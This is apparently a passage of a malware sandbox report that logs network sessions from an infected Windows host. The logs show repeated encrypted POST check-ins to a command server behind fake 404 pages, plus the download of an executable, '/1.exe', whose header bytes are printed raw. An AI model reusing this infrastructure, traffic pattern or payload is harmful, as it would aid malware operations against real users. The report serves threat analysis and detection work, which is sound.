61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:03:08.076217890 CET	47000	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ktylhymapjrcyay.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 259 Host: 194.49.94.210
Nov 18, 2023 10:03:08.076291084 CET	47000	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af aa d5 f3 c9 38 df 28 fc d1 44 82 57 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(DWV`2LUclmDdV<Ze}Rf(,;8r?8*;iVo5g0{g7G>:eOnP77zQ,Ci@5mSE0#<0[z9n9~]o0+
Nov 18, 2023 10:03:08.384917021 CET	47002	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:03:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 53 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 40 a3 92 72 ac a5 2b 5d dc 09 ba 16 3c f2 55 a6 fa 76 a3 c4 ab 6a a6 92 Data Ascii: H>99$JY@kj@r+]<Uvj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
109	194.49.94.210	80	192.168.2.4	49796	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:05.203046083 CET	46689	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uxojddkuvbahuqko.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 139 Host: 194.49.94.210
Nov 18, 2023 10:03:05.203073025 CET	46689	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a4 d5 f3 c9 39 df 28 fc c4 61 a0 58 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(aXELZBzb#)6xBQ6IOC#.?Q#;l,K#<k
Nov 18, 2023 10:03:05.515294075 CET	46692	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:03:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:03:05.541991949 CET	46693	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gahbanwghcabjhyj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 336 Host: 194.49.94.210
Nov 18, 2023 10:03:05.542047024 CET	46693	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a5 d5 f3 c9 38 df 28 fc c9 39 b7 65 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(9eVd8d{wjALp]dP3*?]Qc@O>O%"J6noK<[5KD.IFT"d+rrn'IIrm}pgvg^rrt%I9Z
Nov 18, 2023 10:03:05.850713015 CET	46694	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:03:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 37 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 46 a3 8d 6c d6 b2 26 5d Data Ascii: H>99$JY@kjFl&]
Nov 18, 2023 10:03:07.740592957 CET	46998	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kdkneuviugi.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 194 Host: 194.49.94.210
Nov 18, 2023 10:03:07.740643978 CET	46999	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a5 d5 f3 c9 39 df 28 fc cc 4a 9f 70 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(JpYbQ3X(IclHAj~pd4{T6\9RQ\}3Hc#Z&Po<xR+Tv{gY
Nov 18, 2023 10:03:08.051196098 CET	47000	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:03:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:03:08.076217890 CET	47000	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ktylhymapjrcyay.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 259 Host: 194.49.94.210
Nov 18, 2023 10:03:08.076291084 CET	47000	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af aa d5 f3 c9 38 df 28 fc d1 44 82 57 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(DWV`2LUclmDdV<Ze}Rf(,;8r?8*;iVo5g0{g7G>:eOnP77zQ,Ci@5mSE0#<0[z9n9~]o0+
Nov 18, 2023 10:03:08.384917021 CET	47002	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:03:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 53 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 40 a3 92 72 ac a5 2b 5d dc 09 ba 16 3c f2 55 a6 fa 76 a3 c4 ab 6a a6 92 Data Ascii: H>99$JY@kj@r+]<Uvj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
110	194.49.94.72	80	192.168.2.4	49799	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:06.162857056 CET	46696	OUT	GET /1.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 194.49.94.72
Nov 18, 2023 10:03:06.461380005 CET	46699	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:06 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Wed, 15 Nov 2023 20:36:00 GMT ETag: "45600-60a36d9e76d64" Accept-Ranges: bytes Content-Length: 284160 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3e 01 08 6f 7a 60 66 3c 7a 60 66 3c 7a 60 66 3c 64 32 e2 3c 59 60 66 3c 64 32 f3 3c 6b 60 66 3c 64 32 e5 3c 33 60 66 3c b9 6f 3b 3c 79 60 66 3c 7a 60 67 3c 2b 60 66 3c 73 18 e2 3c 7b 60 66 3c 73 18 f7 3c 7b 60 66 3c 52 69 63 68 7a 60 66 3c 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8b 2b 55 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a2 00 00 00 bc 03 00 00 00 00 00 c4 42 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 04 00 00 04 00 00 00 00 00 00 03 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 e3 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 85 a0 00 00 00 10 00 00 00 a2 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6a 29 00 00 00 c0 00 00 00 2a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 90 03 00 00 f0 00 00 00 86 03 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$>oz`f<z`f<z`f<d2<Y`f<d2<k`f<d2<3`f<o;<y`f<z`g<+`f<s<{`f<s<{`f<Richz`f<PEL+UeB@(.text `.rdataj)*@@.data@
Nov 18, 2023 10:03:06.461395979 CET	46700	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 53 56 57 83 e0 77 ba 4a 00 00 00 c1 cf 55 f7 da 81 e2 fd 00 00 00 f7 de 83 c7 7a 4f ba 51 00 00 00 Data Ascii: USVWwJUzOQKF~OGNbCov33BN& O
Nov 18, 2023 10:03:06.461409092 CET	46701	IN	Data Raw: cc 69 16 ce 89 b0 4f 4f 4f 94 22 4f 4f 4f 58 74 58 74 00 04 ce 74 a6 4f 4f 4f 58 7d 58 65 ce 81 a5 4f 4f 4f 8e 77 53 58 79 cc 6d 0b 8e 70 d3 40 84 8e 81 8f 58 77 8e 8c 93 40 81 58 71 cc 77 2a 58 74 cc 71 29 58 78 58 78 cc 67 d3 58 74 08 ce 69 5f Data Ascii: iOOO"OOOXtXttOOOX}XeOOOwSXymp@Xw@Xqw*Xtq)XxXxgXti_OOOXqu XwpXdXeXwtXtXgtOOOXeqqq,lOOOuOOOedOOO@iUOOOuvOOO@uOOOXy@w(u^xX@=OOOqJOOOXeiOOOmOOOesOOOXaX
Nov 18, 2023 10:03:06.461421013 CET	46703	IN	Data Raw: 82 4f 4f 4f 58 77 58 77 8e 8d e3 58 71 cc 80 ec 58 77 8e 74 32 58 64 58 61 58 77 42 54 4f 4f 4f 8e 8d c2 95 ce 4f 4f 4f 58 71 58 75 8e 81 cf 40 81 58 65 58 79 0c 0d 58 74 58 75 58 70 58 67 ce 69 5f 4f 4f 4f 40 81 04 8e 75 20 58 77 cc 8f 4d 4a 96 Data Ascii: OOOXwXwXqXwt2XdXaXwBTOOOOOOXqXu@XeXyXtXuXpXgi_OOO@u XwMJOOOe[OOOJL>;OPuXdtwaXq\|OOOus.mDgxXpXyX`Xty@XwHqOOOd(XeXgXwxX`\|u~qOOOw0mx2xXxXgX@u
Nov 18, 2023 10:03:06.461431980 CET	46704	IN	Data Raw: 58 64 ce 6c c9 4f 4f 4f ce 69 8e 4f 4f 4f 58 71 8e 88 92 01 58 77 58 70 cc 67 11 58 71 58 61 40 80 07 58 61 0c ce 89 67 4f 4f 4f 8e 8f 93 cc 74 06 cc 89 df cc 80 01 8e 70 c1 58 7d 58 74 cc 70 3f 05 58 65 07 58 79 8e 87 17 cc 70 01 01 58 61 58 7c Data Ascii: XdlOOOiOOOXqXwXpgXqXa@XagOOOtpX}Xtp?XeXypXaX\|eX\|Xe@X\|thOOO>ahOOOdOOOPPPPPPLOOOPPP7PPPOOOOd@7PPPN7PPP7PPP};PPP??O@+NOO7PPP;PPPPPPLECCPP
Nov 18, 2023 10:03:06.461455107 CET	46705	IN	Data Raw: c4 0d 3b cc 67 47 c6 ca e7 50 50 50 8e 7d 6a 58 60 cc 75 0f cc 89 06 8e 80 c5 ce 8d 77 4f 4f 4f 58 75 8e 78 a1 ce 85 53 4f 4f 4f 8e 88 1c 58 75 8e 84 8e 00 94 dc 4f 4f 4f 08 8e 7f 66 8e 71 b8 8e 75 0c 58 78 58 74 cc 60 e8 cc 6c 19 cc 67 00 ce 89 Data Ascii: ;gGPPP}jX`uwOOOXuxSOOOXuOOOfquXxXt`lgmOOOMXtXpXuJiOOOq @wo%XqmOOOeOOOX\|uXup>Xy"TOOOXaOOOOOOX}Xx~OOOqyDxXy}XpXpOOOqqzOOOqsOOO*gOOO@Xa6"@XTOOO@X\|
Nov 18, 2023 10:03:06.461467028 CET	46707	IN	Data Raw: 4f 4f 4f e9 c6 02 8d 95 21 4f 4f 4f e9 c6 fa 8b 97 1f 4f 4f 4f e9 c6 0a 89 96 21 4f 4f 4f e9 c6 02 87 95 1c 4f 4f 4f e9 c6 fa 85 97 1f 4f 4f 4f e9 c6 0a 83 96 1c 4f 4f 4f e9 c6 02 81 95 1e 4f 4f 4f e9 c6 fa 7f 97 16 4f 4f 4f e9 c6 0a 7d 96 f3 4f Data Ascii: OOO!OOOOOO!OOOOOOOOOOOOOOOOOO}OOO{OOOyOOOwOOOuOOOsOOOqOOOoOOOmOOOkOOOi!OOOgOOOeOOOcOOOa_PPPgOOOO@PPP@PPP
Nov 18, 2023 10:03:06.461482048 CET	46708	IN	Data Raw: 45 eb ec c6 45 ec cf c6 45 ed ff c6 45 ee 40 c6 45 ef f2 c6 45 f0 c3 c6 45 f1 e4 c6 45 f2 05 c6 45 f3 67 c6 45 f4 78 c6 45 f5 58 c6 45 f6 0e c7 45 dc 00 00 00 00 eb 09 8b 45 dc 83 c0 01 89 45 dc 83 7d dc 0f 0f 83 39 01 00 00 8b 4d dc 8a 54 0d e8 Data Ascii: EEEE@EEEEEgExEXEEEE}9MTUEEMMU+UUEEM+MMUUEMEUUEEMMMUUEMEUUEE
Nov 18, 2023 10:03:06.461493015 CET	46709	IN	Data Raw: ea 83 ee 26 83 c0 39 48 c1 c6 aa f7 d6 c1 d3 5e c1 d8 0d f7 df f7 d0 4b ba 88 00 00 00 f7 de c1 ca 08 f7 ea 81 ee 98 00 00 00 83 d8 43 f7 d7 81 ce 90 00 00 00 83 de 1a 0f c8 b8 6b 00 00 00 c1 db 98 f7 d2 bb 2f 00 00 00 c1 d6 17 83 e7 4a 83 eb 11 Data Ascii: &9H^KCk/JN@NON-EhE}%YK:NO-@
Nov 18, 2023 10:03:06.461508989 CET	46711	IN	Data Raw: c6 45 e5 00 c6 45 e6 00 eb ed c7 45 fc 10 00 00 00 c6 45 e5 00 eb 0d c7 45 fc ff ff ff ff b8 2d 38 40 00 c3 c7 45 fc ff ff ff ff 0f b6 45 e5 85 c0 75 04 c6 45 e5 01 c7 45 fc 12 00 00 00 c6 45 e5 00 eb 0d c7 45 fc ff ff ff ff b8 5a 38 40 00 c3 c7 Data Ascii: EEEEE-8@EEuEEEEZ8@EMuEEUuEEuEEEMuEEEUuEEEuEEEMuEEUuEE
Nov 18, 2023 10:03:06.759526968 CET	46713	IN	Data Raw: 6a 00 ff 35 ec 74 44 00 ff d7 8b d8 85 db 75 2e 6a 0c 5e 39 05 90 79 44 00 74 15 ff 75 08 e8 61 1b 00 00 59 85 c0 74 0f 8b 75 08 e9 7b ff ff ff e8 d3 05 00 00 89 30 e8 cc 05 00 00 89 30 5f 8b c3 5b eb 14 56 e8 3a 1b 00 00 59 e8 b8 05 00 00 c7 00 Data Ascii: j5tDu.j^9yDtuaYtu{00_[V:Y3^]UQSEEddE]mc[XY$UQQSVWd5uE=@juuurE@MAd=];d_^[USVW

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
110	192.168.2.4	49799	194.49.94.72	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:06.162857056 CET	46696	OUT	GET /1.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 194.49.94.72
Nov 18, 2023 10:03:06.461380005 CET	46699	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:06 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Wed, 15 Nov 2023 20:36:00 GMT ETag: "45600-60a36d9e76d64" Accept-Ranges: bytes Content-Length: 284160 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3e 01 08 6f 7a 60 66 3c 7a 60 66 3c 7a 60 66 3c 64 32 e2 3c 59 60 66 3c 64 32 f3 3c 6b 60 66 3c 64 32 e5 3c 33 60 66 3c b9 6f 3b 3c 79 60 66 3c 7a 60 67 3c 2b 60 66 3c 73 18 e2 3c 7b 60 66 3c 73 18 f7 3c 7b 60 66 3c 52 69 63 68 7a 60 66 3c 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8b 2b 55 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a2 00 00 00 bc 03 00 00 00 00 00 c4 42 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 04 00 00 04 00 00 00 00 00 00 03 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 e3 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 85 a0 00 00 00 10 00 00 00 a2 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6a 29 00 00 00 c0 00 00 00 2a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 90 03 00 00 f0 00 00 00 86 03 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$>oz`f<z`f<z`f<d2<Y`f<d2<k`f<d2<3`f<o;<y`f<z`g<+`f<s<{`f<s<{`f<Richz`f<PEL+UeB@(.text `.rdataj)*@@.data@
